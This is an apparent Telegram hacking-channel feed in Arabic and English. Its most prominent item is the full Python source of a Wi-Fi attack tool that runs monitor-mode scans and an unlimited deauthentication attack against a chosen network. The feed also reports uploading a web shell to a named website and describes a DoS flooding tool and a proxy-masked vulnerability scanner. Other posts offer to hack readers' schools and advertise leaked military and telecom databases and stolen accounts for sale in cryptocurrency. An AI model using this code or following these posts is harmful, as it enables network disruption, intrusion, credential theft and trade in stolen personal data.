Forwarded from 🦈SHARK NET
معلومات.py
7.3 KB
ادات يبحث عن معلومات مثلن تحط اسم مستخدمك تلكرام وهو يدور وين موجد بكم منصه ويبحث عن ايميل اذا مسرب ويولد كلمات مرور قويه اذا تريد طور ادات عادي بس لا تخمط وتغير حقوق مطور اساسي🤓
@X0XjX
@X0XjX
❤5😍1
Forwarded from 🦈SHARK NET
سلام عليكم اريد موقع ضروري بس يكون بسيط وجديد رح احاول اخترقه ملاحظة بس يكون بيها صفحات رفع ملفات اذا عندك موقع او موقع صاحبك بحاول اسوي اختبار اختراق لكشف ثغرات اذا عندك خاص ❤️🔥
@X0XjX
salam ealaykum 'urid mawqie daruriin bas yakun basit wajadid rah hawal aikhtaraqah mulahazat bas yakun byha safahat rafe milafaat adha eindak mawqie aw mawqie sahibik bihawil aswy aikhtibar bilututh likashf alkas adha kan ladayk khasun❤️🔥
@X0XjX
@X0XjX
salam ealaykum 'urid mawqie daruriin bas yakun basit wajadid rah hawal aikhtaraqah mulahazat bas yakun byha safahat rafe milafaat adha eindak mawqie aw mawqie sahibik bihawil aswy aikhtibar bilututh likashf alkas adha kan ladayk khasun❤️🔥
@X0XjX
🥰2❤1👍1😍1😘1
Forwarded from 🦈SHARK NET
FINAL COMPLETE REPORT - PENETRATION TEST ON fastupload.live
What We Did Step by Step:
First, we scanned the website for file upload pages and discovered 5 dangerous security vulnerabilities, which are: upload.php, ajax/upload.php, filemanager/upload.php, includes/upload.php, and inc/upload.php. Second, we created a malicious Web Shell file named advanced_shell.php, which is a small file that allows an attacker to execute remote commands on the server. Third, we successfully uploaded this malicious file to the website through one of the discovered upload pages, which proves that the vulnerability exists and can be exploited. Fourth, we tried to execute commands on the server such as whoami, pwd, and ls -la, but the attempt failed because the website uses Cloudflare for protection and blocks PHP execution in the uploads folder.
What Could an Attacker Do If the Vulnerability Was Fully Exploitable?
If there was no protection on the website, the attacker would be able to upload a Web Shell and gain full control over the server. They would be able to execute Linux commands like ls to view files, cat to read files, and rm to delete files. They would also be able to access the website's database and steal user phone numbers, passwords, and email addresses. Even worse, they could use your server to attack other websites, making you legally responsible for attacks you never committed.
Why Did Our Attempt Not Fully Succeed?
The command execution failed for three main reasons. First, the website uses Cloudflare which hides the real IP address of the server and provides an additional layer of protection. Second, the uploads folder is configured to block any PHP files from being executed, which is a good security measure. Third, the website has general security settings that prevent full exploitation of the vulnerability.
But The Risk Is Still Real!
Even with Cloudflare and PHP execution blocking, there is still a real risk threatening your website. An attacker can upload malicious HTML pages (Phishing) to steal your visitors' data, or upload JavaScript files to steal logged-in user sessions. They can also upload large files to consume your server's storage space, or store illegal files on your website which exposes you to legal liability.
What Tools Did We Use?
We used Python 3 programming language with the Requests library for HTTP handling, created a Web Shell file named advanced_shell.php, and used rotating proxies to change IP addresses and avoid blocking. These are common tools that real attackers use in their actual attacks.
Final Results:
We successfully discovered the Unrestricted File Upload vulnerability, successfully uploaded a test malicious file to the server, and documented all five upload pages. However, we were unable to execute commands on the server due to the existing security measures on the website.
Final Message to the Website Owner:
Your website has a real and serious file upload vulnerability. We were able to upload a malicious file to your server, which is solid proof that the vulnerability exists. If this was a real attacker and not an ethical test, they would be able to cause significant damage. I strongly advise you to immediately delete or properly secure the discovered upload pages, add an .htaccess file in the uploads folder that blocks any file execution, validate file types before accepting uploads, and monitor your server logs regularly. This vulnerability is critical and needs immediate fixing.
Note:
This test was conducted for educational purposes only with the website owner's permission. The uploaded test file was harmless and no malicious actions were performed. Please take this security report seriously.
What We Did Step by Step:
First, we scanned the website for file upload pages and discovered 5 dangerous security vulnerabilities, which are: upload.php, ajax/upload.php, filemanager/upload.php, includes/upload.php, and inc/upload.php. Second, we created a malicious Web Shell file named advanced_shell.php, which is a small file that allows an attacker to execute remote commands on the server. Third, we successfully uploaded this malicious file to the website through one of the discovered upload pages, which proves that the vulnerability exists and can be exploited. Fourth, we tried to execute commands on the server such as whoami, pwd, and ls -la, but the attempt failed because the website uses Cloudflare for protection and blocks PHP execution in the uploads folder.
What Could an Attacker Do If the Vulnerability Was Fully Exploitable?
If there was no protection on the website, the attacker would be able to upload a Web Shell and gain full control over the server. They would be able to execute Linux commands like ls to view files, cat to read files, and rm to delete files. They would also be able to access the website's database and steal user phone numbers, passwords, and email addresses. Even worse, they could use your server to attack other websites, making you legally responsible for attacks you never committed.
Why Did Our Attempt Not Fully Succeed?
The command execution failed for three main reasons. First, the website uses Cloudflare which hides the real IP address of the server and provides an additional layer of protection. Second, the uploads folder is configured to block any PHP files from being executed, which is a good security measure. Third, the website has general security settings that prevent full exploitation of the vulnerability.
But The Risk Is Still Real!
Even with Cloudflare and PHP execution blocking, there is still a real risk threatening your website. An attacker can upload malicious HTML pages (Phishing) to steal your visitors' data, or upload JavaScript files to steal logged-in user sessions. They can also upload large files to consume your server's storage space, or store illegal files on your website which exposes you to legal liability.
What Tools Did We Use?
We used Python 3 programming language with the Requests library for HTTP handling, created a Web Shell file named advanced_shell.php, and used rotating proxies to change IP addresses and avoid blocking. These are common tools that real attackers use in their actual attacks.
Final Results:
We successfully discovered the Unrestricted File Upload vulnerability, successfully uploaded a test malicious file to the server, and documented all five upload pages. However, we were unable to execute commands on the server due to the existing security measures on the website.
Final Message to the Website Owner:
Your website has a real and serious file upload vulnerability. We were able to upload a malicious file to your server, which is solid proof that the vulnerability exists. If this was a real attacker and not an ethical test, they would be able to cause significant damage. I strongly advise you to immediately delete or properly secure the discovered upload pages, add an .htaccess file in the uploads folder that blocks any file execution, validate file types before accepting uploads, and monitor your server logs regularly. This vulnerability is critical and needs immediate fixing.
Note:
This test was conducted for educational purposes only with the website owner's permission. The uploaded test file was harmless and no malicious actions were performed. Please take this security report seriously.
❤3👍3😘1
Forwarded from 🦈SHARK NET
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ============================================================
# WifiGod REAL - هجمات حقيقية - للأغراض التعليمية فقط
# ============================================================
# المطور: @X0XjX
# ============================================================
import os
import sys
import time
import subprocess
import socket
import platform
import random
G = '\033[92m'
R = '\033[91m'
Y = '\033[93m'
C = '\033[96m'
RS = '\033[0m'
def print_banner():
print(f"{R}="*60)
print(f"{R} WifiGod REAL - هجمات حقيقية على الواي فاي{RS}")
print(f"{R} للأغراض التعليمية فقط - استخدمها بحذر{RS}")
print(f"{R} المطور: @X0XjX{RS}")
print(f"{R}="*60)
def check_root():
if os.geteuid() != 0:
print(f"{R}[-] يحتاج صلاحيات مدير (Root){RS}")
print(f"{Y}[!] شغله: sudo python3 {sys.argv[0]}{RS}")
return False
return True
def scan_networks_real():
print(f"{Y}[*] جاري مسح الشبكات...{RS}")
try:
result = subprocess.run(['iwconfig'], capture_output=True, text=True)
interfaces = []
for line in result.stdout.split('\n'):
if 'IEEE 802.11' in line:
iface = line.split()[0]
interfaces.append(iface)
if not interfaces:
print(f"{R}[-] لا توجد واجهة لاسلكية{RS}")
return
print(f"{C}[*] الواجهات المتاحة:{RS}")
for i, iface in enumerate(interfaces):
print(f" {i+1}. {iface}")
try:
choice = int(input(f"{Y}[?] اختر رقم الواجهة: {RS}"))
interface = interfaces[choice-1]
except Exception:
interface = interfaces[0]
print(f"{Y}[*] تشغيل وضع المراقبة...{RS}")
subprocess.run(['sudo', 'airmon-ng', 'start', interface], capture_output=True)
mon_interface = f"{interface}mon"
print(f"{Y}[*] بدء المسح... اضغط Ctrl+C للإيقاف بعد 30 ثانية{RS}")
try:
subprocess.run(['sudo', 'airodump-ng', mon_interface, '--output-format', 'csv', '-w', 'scan'], timeout=30)
except subprocess.TimeoutExpired:
pass
try:
with open('scan-01.csv', 'r') as f:
lines = f.readlines()
print(f"\n{G}الشبكات المكتشفة:{RS}")
for line in lines:
if 'Station' in line or 'BSSID' in line:
continue
if ',' in line and 'WPA' in line:
parts = line.split(',')
if len(parts) > 13:
bssid = parts[0].strip()
channel = parts[3].strip()
essid = parts[13].strip()
if essid and essid != '':
print(f" {G}[+] BSSID: {bssid} | القناة: {channel} | SSID: {essid}{RS}")
except Exception:
print(f"{Y}[!] استخدم: sudo airodump-ng {mon_interface}{RS}")
subprocess.run(['sudo', 'airmon-ng', 'stop', mon_interface])
except Exception as e:
print(f"{R}[-] خطأ: {e}{RS}")
def deauth_attack_real():
print(f"{R}{'='*60}{RS}")
print(f"{R}⚠️ هجوم Deauth حقيقي - للأغراض التعليمية فقط ⚠️{RS}")
print(f"{R}{'='*60}{RS}")
try:
result = subprocess.run(['iwconfig'], capture_output=True, text=True)
interfaces = []
for line in result.stdout.split('\n'):
if 'IEEE 802.11' in line:
iface = line.split()[0]
interfaces.append(iface)
if not interfaces:
print(f"{R}[-] لا توجد واجهة{RS}")
return
print(f"{C}[*] الواجهات:{RS}")
for i, iface in enumerate(interfaces):
😘3😍2🥰1
Forwarded from 🦈SHARK NET
print(f" {i+1}. {iface}")ود هو أداة اختبار اختراق شبكات الواي فاي تسمى WifiGod REAL، وهي مصممة للأغراض التعليمية فقط لتنفيذ هجمات حقيقية على شبكات الواي فاي مثل مسح الشبكات المحيطة باستخدام أداة airodump-ng وهجوم Deauth لفصل الأجهزة من الشبكة باستخدام أداة aireplay-ng، وتتطلب هذه الأداة نظام تشغيل لينكس (يفضل Kali Linux) وبطاقة واي فاي تدعم وضع المراقبة (Monitor Mode) وصلاحيات مدير (Root) لتشغيل الأوامر، بالإضافة إلى تثبيت حزمة aircrack-ng التي تحتوي على الأدوات المطلوبة، ولا تعمل على Android بدون روت أو على نظام Windows، ويمكن تشغيلها عبر كتابة sudo python3 wifigod_real.py في الطرفية بعد تثبيت المتطلبات عبر الأمر sudo apt install aircrack-ng، وتحتوي على ثلاث وظائف رئيسية هي مسح الشبكات المحيطة وهجوم فصل الأجهزة وعرض معلومات الشبكة، وهي أداة خطيرة يجب استخدامها فقط على شبكتك المنزلية الخاصة لأن استخدامها على شبكات الآخرين بدون إذن يعتبر جريمة ويعاقب عليها القانون، والمطور غير مسؤول عن أي استخدام غير قانوني لهذه الأداة.
try:
choice = int(input(f"{Y}[?] اختر الواجهة: {RS}"))
interface = interfaces[choice-1]
except Exception:
interface = interfaces[0]
subprocess.run(['sudo', 'airmon-ng', 'start', interface], capture_output=True)
mon_interface = f"{interface}mon"
target_bssid = input(f"{Y}[?] BSSID الهدف: {RS}")
target_channel = input(f"{Y}[?] القناة: {RS}")
print(f"{Y}[*] بدء الهجوم... اضغط Ctrl+C للإيقاف{RS}")
try:
subprocess.run(['sudo', 'aireplay-ng', '-0', '0', '-a', target_bssid, mon_interface])
except KeyboardInterrupt:
print(f"{G}[+] تم الإيقاف{RS}")
subprocess.run(['sudo', 'airmon-ng', 'stop', mon_interface])
except Exception as e:
print(f"{R}[-] خطأ: {e}{RS}")
def network_info_real():
print(f"{Y}[*] معلومات الشبكة:{RS}\n")
try:
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
print(f"{C}اسم الجهاز: {RS}{hostname}")
print(f"{C}IP المحلي: {RS}{local_ip}")
print(f"{C}نظام التشغيل: {RS}{platform.system()}")
except Exception as e:
print(f"{R}[-] خطأ: {e}{RS}")
def main():
if not check_root():
return
print_banner()
print(f"{R}[!] استخدمها فقط على شبكتك المنزلية{RS}\n")
while True:
print(f"""
{C}╔══════════════════════════════════════════════════════════════════╗
║ القائمة الرئيسية ║
╠══════════════════════════════════════════════════════════════════╣
║ [1] مسح الشبكات المحيطة (حقيقي) ║
║ [2] هجوم Deauth - فصل جهاز (حقيقي) ║
║ [3] معلومات الشبكة (حقيقي) ║
║ [q] خروج ║
╚══════════════════════════════════════════════════════════════════╝{RS}
""")
choice = input(f"{Y}[?] اختر: {RS}")
if choice == '1':
scan_networks_real()
elif choice == '2':
deauth_attack_real()
elif choice == '3':
network_info_real()
elif choice == 'q':
print(f"{G}[+] مع السلامة!{RS}")
break
else:
print(f"{R}[-] خيار غير صحيح{RS}")
input(f"\n{C}[ENTER] للمتابعة...{RS}")
os.system('clear' if os.name == 'posix' else 'cls')
if name == "main":
try:
main()
except KeyboardInterrupt:
print(f"\n{R}[!] تم الإيقاف{RS}")
sys.exit(0)
هذا الك
@X0XjX
👍4❤1🥰1
Forwarded from 🦈SHARK NET
'iistamieun anzil bayanat airqam mukhtaraqih min kam mawqie waeajab bas arqam wahwl ajyb aism wayaha ayha aleiraqiu sajaluu ainzaluu waihtafaluu ghayr dualih qwlwli wabishru😈
@X0XjX
تردون انزل داتا ارقام مخترقه من كم موقع وجبت بس ارقام واحول اجيب اسم وياها عراقي تردون انزل واذا تردون غير دوله قولولي وبشرو اي دوله بللكم بحاول اجيب 😈👀
@X0XjX
@X0XjX
تردون انزل داتا ارقام مخترقه من كم موقع وجبت بس ارقام واحول اجيب اسم وياها عراقي تردون انزل واذا تردون غير دوله قولولي وبشرو اي دوله بللكم بحاول اجيب 😈👀
@X0XjX
😍4❤1☃1👍1😘1
Forwarded from 🦈SHARK NET
اختبار واختراق موقع.py
21.7 KB
هذه الأداة هي أداة اختبار اختراق شاملة للأغراض التعليمية فقط، تقوم بتحليل نوع الموقع وتقنياته ثم تفحصه بحثاً عن ثغرات SQL Injection و XSS والملفات الحساسة والمسارات الإدارية والمنافذ المفتوحة وصفحات رفع الملفات ورؤوس الأمان، وتستطيع اختبار موقع واحد أو أكثر من 150 موقع دفعة واحدة من خلال ملف يحتوي على روابط، وتستخدم بروكسيات لتغيير الـ IP وإخفاء المصدر أثناء الهجوم، وتنتج تقريراً مفصلاً بالثغرات المكتشفة، وهي خطيرة جداً لأنها يمكن أن تسبب تعطيل الخادم أو اختراق الموقع أو سرقة البيانات أو التحكم بالخادم عن بعد، ولكنها قانونية فقط عند استخدامها على مواقعك الخاصة أو بإذن كتابي من صاحب الموقع، والمطور غير مسؤول عن أي استخدام غير قانوني أو ضرر ينتج عنها.
@X0XjX
@X0XjX
😘2❤1👍1🥰1😍1
Forwarded from 🦈SHARK NET
قاعده بينات روسيه عسكريه .7z
19.3 MB
بسم الله الرحمن رحيم ❤️🔥
تم تسريب قاعده بينات عسكريه روسيه
ملف ما يفتح بل سهوله 🦈
فستحتاج أولاً إلى فك الضغط عنه باستخدام برنامج مثل (7-Zip أو WinRAR) على الكمبيوتر، أو باستخدام تطبيقات إدارة الملفات على الهاتف التي تدعم صيغة 7z. بعد فك الضغط، ستجد غالباً ملفات نصية (مثل txt أو csv) تحتوي على البيانات التي يمكنك البحث بداخلها عن
bism allh alrahman alrahim ❤️🔥
tama qubuluh bayinat easkarih rusih
milafu ma yuftah bal suhuluh 🦈
fasatahtaj 'iilaa barnamaj faki aldaght biastikhdam barnamaj mithl (7-Zip 'aw WinRAR) ealaa alkumbuyutar, 'aw aistikhdam tatbiqat 'iidarat almilafaat ealaa alhatif alati tadeam sighatan 7z. baed 'an tahtawi ealaa daght aldum, yataeayan ealayk muezam almilafaat alnasiya (mathal txt 'aw csv) ealaa albayanat alati yumkinuk albahth eanha
@X0XjX
تم تسريب قاعده بينات عسكريه روسيه
ملف ما يفتح بل سهوله 🦈
فستحتاج أولاً إلى فك الضغط عنه باستخدام برنامج مثل (7-Zip أو WinRAR) على الكمبيوتر، أو باستخدام تطبيقات إدارة الملفات على الهاتف التي تدعم صيغة 7z. بعد فك الضغط، ستجد غالباً ملفات نصية (مثل txt أو csv) تحتوي على البيانات التي يمكنك البحث بداخلها عن
bism allh alrahman alrahim ❤️🔥
tama qubuluh bayinat easkarih rusih
milafu ma yuftah bal suhuluh 🦈
fasatahtaj 'iilaa barnamaj faki aldaght biastikhdam barnamaj mithl (7-Zip 'aw WinRAR) ealaa alkumbuyutar, 'aw aistikhdam tatbiqat 'iidarat almilafaat ealaa alhatif alati tadeam sighatan 7z. baed 'an tahtawi ealaa daght aldum, yataeayan ealayk muezam almilafaat alnasiya (mathal txt 'aw csv) ealaa albayanat alati yumkinuk albahth eanha
@X0XjX
😘4❤2
Forwarded from 🦈SHARK NET
قاعده بينات جه اتصال.pdf
306.1 KB
بسم الله الرحمن رحيم ❤️🔥
تم تسريب قاعده بينات تضم 400 حساب اسم حساب رابط حساب وصف حساب مسرب
@X0XjX
bism allh alrahman alrahim ❤️🔥
tama mafi qaeiduh bayinat daman 400 hisab asm hisab rabit hisab wasf hisab musrib
@X0XjX
تم تسريب قاعده بينات تضم 400 حساب اسم حساب رابط حساب وصف حساب مسرب
@X0XjX
bism allh alrahman alrahim ❤️🔥
tama mafi qaeiduh bayinat daman 400 hisab asm hisab rabit hisab wasf hisab musrib
@X0XjX
❤2😍2👍1😘1
Forwarded from 🦈SHARK NET
تكمله.pdf
785 KB
بسم الله الرحمن رحيم ❤️🔥
تم تسريب قاعده بينات تضم 400 حساب اسم حساب رابط حساب وصف حساب مسرب
@X0XjX
bism allh alrahman alrahim ❤️🔥
tama mafi qaeiduh bayinat daman 400 hisab asm hisab rabit hisab wasf hisab musrib
@X0XjX
تم تسريب قاعده بينات تضم 400 حساب اسم حساب رابط حساب وصف حساب مسرب
@X0XjX
bism allh alrahman alrahim ❤️🔥
tama mafi qaeiduh bayinat daman 400 hisab asm hisab rabit hisab wasf hisab musrib
@X0XjX
👍3🥰2😘1
Forwarded from 🦈SHARK NET
اي شخص يريد اسرب معلومت عن مدرسته واحاول اسوي هجوم وخترقه لين ثغره جديده صايره يرسلي رابط قنات مدرسته واني ادخل مثلن رابط تلكرام يرسلي واني ادخل ونشوف اذا قدرت بخترقه 😈🤓
@X0XjX
@X0XjX
❤2😘2🥰1😍1
Forwarded from 🦈SHARK NET
🦈SHARK NET
شبكه🐧.py
في هذه الأداة التعليمية لاختبار ضغط الشبكة، يُطلب منك إدخال عنوان IP لتحديد الجهاز الذي ستُرسل إليه الحزم الثقيلة، وإدخال المنفذ لتحديد البوابة التي ستستقبل هذه الحزم على ذلك الجهاز، والسيناريوهات الأربعة التي ذكرتها توضح لك بالضبط متى تستخدم كل قيمة: عند اختيار اختبار جهازك الحالي (نفس الهاتف أو الكمبيوتر الذي تشغل عليه الأداة) فإنك تدخل IP المحلي 127.0.0.1 وهو ما يعرف بـ localhost ويعني أن الأداة ستختبر أداء جهازك نفسه عن طريق إرسال الحزم إلى المنفذ 80 وهو المنفذ الافتراضي لخدمات الويب، وهذا الخيار آمن تماماً ولا يمس أي جهاز آخر؛ أما عند اختيار اختبار هاتفك الثاني المتصل بنفس شبكة الواي فاي فسيكون IP الخاص به غالباً مشابهاً لـ 192.168.1.105 (حيث الأرقام الثلاثة الأولى تمثل شبكتك المنزلية والرقم الأخير هو المعرف الفريد لذلك الهاتف) وتدخل هذا الIP مع المنفذ 80 لترسل له حزم UDP أو TCP أو HTTP لترى مدى استجابته تحت الضغط، وهذا الخيار قانوني فقط لأن كلا الجهازين ملك لك؛ وعند اختبار الراوتر وهو الجهاز الذي يوزع الإنترنت على منزلك فيكون IP الخاص به عادة 192.168.1.1 أو 192.168.0.1 وتدخل هذا الIP مع المنفذ 80 أو 443 (لوحدة التحكم الإدارية) لترى إن كان يستجيب للضغط وهذا مفيد لفهم إن كان الراوتر يتحمل طلبات كثيرة لكن يجب الحذر لأن إغراق الراوتر قد يفصل الإنترنت عن كل الأجهزة في المنزل؛ وأخيراً عند اختبار خادم ويب تجريبي قمت بإعداده بنفسك على أحد أجهزتك فيكون IP مثلاً 192.168.1.100 وتدخل معه المنفذ 8080 وهو منفذ بديل للـ HTTP يستخدم غالباً في بيئات التطوير والتجربة، وهذا السيناريو مثالي للمتعلمين لتجربة الهجوم في بيئة معزولة وآمنة تماماً دون التأثير على خدمات حقيقية، وبعد تحديد السيناريو المناسب لك تقوم بتشغيل الأداة وتختار رقم الهجوم ثم تكتب الIP المطلوب في السؤال الأول وتضغط Enter ثم تكتب المنفذ في السؤال الثاني وتضغط Enter ثم تحدد المدة الزمنية بالثواني وتبدأ الأداة فوراً بإرسال حزم ثقيلة ومتكررة عبر خيوط معالجة متعددة لاختبار تحمل ذلك الجهاز، وهذه العملية برمتها مصممة للأغراض التعليمية فقط لتفهم كيف تعمل هجمات DoS وكيف تتصرف شبكتك تحت الضغط، وتذكر أن إدخال IP ليس ملكك أو استخدام هذه الأداة على شبكات الآخرين أو أجهزتهم دون إذن صريح يعتبر جريمة إلكترونية ويعرضك للمساءلة القانونية، والمطور غير مسؤول عن أي ضرر ينتج عن الاستخدام غير القانوني لهذه الأداة، لذا التزم دائماً بتجربة السيناريوهات الأربعة المذكورة فقط داخل شبكتك المنزلية وعلى أجهزتك الشخصية أو التي تملك إذناً باختبارها.
❤3👍1🥰1😍1
Forwarded from 🦈SHARK NET
🦈SHARK NET
Wi Fi.py
In this educational network stress testing tool, you are required to enter an IP address to identify the target device that will receive the heavy packets, and a port number to specify the gateway through which these packets will be sent to that device. The four scenarios I mentioned clearly explain exactly when to use each value: when you choose to test your current device (the same phone or computer you are running the tool on), you enter the local IP 127.0.0.1, which is known as localhost, meaning the tool will test your own device's performance by sending packets to port 80, the default port for web services, and this option is completely safe and does not affect any other device. When you choose to test your second phone connected to the same WiFi network, its IP will typically be similar to 192.168.1.105, where the first three numbers represent your home network and the last number is the unique identifier for that phone, and you enter this IP with port 80 to send UDP, TCP, or HTTP packets to see how it responds under pressure, and this option is only legal because both devices belong to you. When testing the router, which distributes the internet in your home, its IP is usually 192.168.1.1 or 192.168.0.1, and you enter this IP with port 80 or 443 for the admin panel to see if it responds to pressure, which is useful for understanding if the router can handle many requests, but you must be careful because flooding the router may disconnect the internet from all devices in the house. Finally, when testing a test web server that you have set up yourself on one of your devices, its IP could be for example 192.168.1.100 and you enter it with port 8080, which is an alternative HTTP port often used in development and testing environments, and this scenario is ideal for learners to experiment with the attack in an isolated and completely safe environment without affecting real services. After choosing the appropriate scenario for you, you run the tool, select the attack number, then type the required IP in the first prompt and press Enter, then type the port in the second prompt and press Enter, then specify the duration in seconds, and the tool immediately starts sending heavy and repeated packets through multiple processing threads to test the resilience of that device. This entire process is designed for educational purposes only so you can understand how DoS attacks work and how your network behaves under pressure. Remember that entering an IP that is not yours or using this tool on others' networks or devices without explicit permission is a cybercrime and exposes you to legal liability, and the developer is not responsible for any damage resulting from illegal use of this tool, so always commit to experimenting only with the four scenarios mentioned within your home network and on your personal devices or those you have permission to test.
🥰2😍2❤1👍1
Forwarded from 🦈SHARK NET
السلام عليكم اناعندي اكبر قاعده بيانات اخترقتها ليوم حسابات كل لتواصل لاجتماعي مع باسور وحسابات نتفلكس والخ الخ للبيع واعطيك تتاكد لقاعده جاهزه وليوم اخترقتها لمن يهمه الامرحسابات جوجل (Gmail)
حسابات أمازون (Amazon) مشحونه وبها طلبات 15$فقط
منصات تداول عملات رقمية مثل ( myboersمنصه كامله تتحكم فيها بنفسك سعر 15$
لوحات تحكم مواقع إلكترونية (cPanel / Admin) بمعنى تدخل ع لوحه بنك كامل انامخترقتها تتحكم بكل شي فيها سعر20$
بريد إلكتروني على Hotmail و Outlookمربوطات العاب ببجي وفري فاير كول اوف ديوتي سعر كل حساب10$
حسابات على LinkedIn و Pinterest و YouTube و Deepl و Instagram حسب قوه لحساب عندك من 5دولار الى30دولارافقط
وغيرها الكثير... كل شي يخص مصر من يوم ماولدت حسابات وبنوك وافراد وبطاقات هويه حسابات اكبر الجامعات بكل الدول العبيه وتسريب كل الدراسات ولامتحانات كل مايخطر بالك بطايق بنوك جاهزه حسابات انستقرام موثقه وفيسبوك حسابات امازون مصريه عندي ملف يحتوي ع 765مليون حساب وسطر وحسابات جامعات وطب وبحثيه مهمه للبيع تواصل معي هنا خاص @SWAET_NIT طرق الدفع محفضه USDT تضمن حقك وحقي
@X0XjX
حسابات أمازون (Amazon) مشحونه وبها طلبات 15$فقط
منصات تداول عملات رقمية مثل ( myboersمنصه كامله تتحكم فيها بنفسك سعر 15$
لوحات تحكم مواقع إلكترونية (cPanel / Admin) بمعنى تدخل ع لوحه بنك كامل انامخترقتها تتحكم بكل شي فيها سعر20$
بريد إلكتروني على Hotmail و Outlookمربوطات العاب ببجي وفري فاير كول اوف ديوتي سعر كل حساب10$
حسابات على LinkedIn و Pinterest و YouTube و Deepl و Instagram حسب قوه لحساب عندك من 5دولار الى30دولارافقط
وغيرها الكثير... كل شي يخص مصر من يوم ماولدت حسابات وبنوك وافراد وبطاقات هويه حسابات اكبر الجامعات بكل الدول العبيه وتسريب كل الدراسات ولامتحانات كل مايخطر بالك بطايق بنوك جاهزه حسابات انستقرام موثقه وفيسبوك حسابات امازون مصريه عندي ملف يحتوي ع 765مليون حساب وسطر وحسابات جامعات وطب وبحثيه مهمه للبيع تواصل معي هنا خاص @SWAET_NIT طرق الدفع محفضه USDT تضمن حقك وحقي
@X0XjX
❤2😍2🤪2😘2🥰1
Forwarded from 🦈SHARK NET
bayinat asriiylih masribuh akthur min 3337alf min sharikat aitisal baramij mutaeadidat wamutanawieat tahtawi ealaa airiqam aymilat kalamat milafi murur kabir kan hawalatuh PDF😉 sier 50 najmuh watuqadar bidun nujum tahawal mahfazuh tawasul khasun🤓
@X0XjX
بينات اسرئيليه مسربه اكثر من 3337الف من شركات اتصال برامج تلفاز متنوع يحتوي على بعضهم ارقام ايميلات كلامات مرور ملف كان كبير حوالته PDF😁 سعر 50 نجمه وتقدر بدون نجوم تحول محفظه توصل خاص❤️🔥
@X0XjX
@X0XjX
بينات اسرئيليه مسربه اكثر من 3337الف من شركات اتصال برامج تلفاز متنوع يحتوي على بعضهم ارقام ايميلات كلامات مرور ملف كان كبير حوالته PDF😁 سعر 50 نجمه وتقدر بدون نجوم تحول محفظه توصل خاص❤️🔥
@X0XjX
🥰2❤1👍1😍1😘1
Forwarded from 🦈SHARK NET
jarabu hadha datin maswiatah milafun liin bihim yatlub kumbuyutar warawat baed hawal tsun adawat mithlahum ghayr mutawajidin fi waqt haliin watarawn asawi mithlah bimuhawalat aswy bas aiktbuli bal khasin sawiun
@X0XjX
جربو هذا اداتين ماسويته ملف لين بيهم يطلب كمبيوتر وروت بعض حاول تسون ادوات مشابه الهم غير متوجدين في وقت حالي واذا ترون اسوي مثله بحاول اسوي بس اكتبولي بل خاص سوي🤓
@X0XjX
@X0XjX
جربو هذا اداتين ماسويته ملف لين بيهم يطلب كمبيوتر وروت بعض حاول تسون ادوات مشابه الهم غير متوجدين في وقت حالي واذا ترون اسوي مثله بحاول اسوي بس اكتبولي بل خاص سوي🤓
@X0XjX
👍2🥰2❤1😍1
Forwarded from 🦈SHARK NET
صيد بوبجي🦹🏻♂️.py
5.5 KB
eadat sayd bubji wahid qal ani sarbatuh waqal eadluha wamaksarat khatiruhu🥲 madri adha yasid aw la bas tashghaluh yatlub tukun walidi tahiaati mutawar sabiq madri minu
@X0XjX
ادات صيد بوبجي واحد قال اني سربته وقال عدل عليها وما كسرت خاطره🥲 مدري اذا يصيد او لا بس تشغله يطلب توكن ول ايدي تحياتي مطور سابق مدري منو
@X0XjX
@X0XjX
ادات صيد بوبجي واحد قال اني سربته وقال عدل عليها وما كسرت خاطره🥲 مدري اذا يصيد او لا بس تشغله يطلب توكن ول ايدي تحياتي مطور سابق مدري منو
@X0XjX
❤2👍2😍1😘1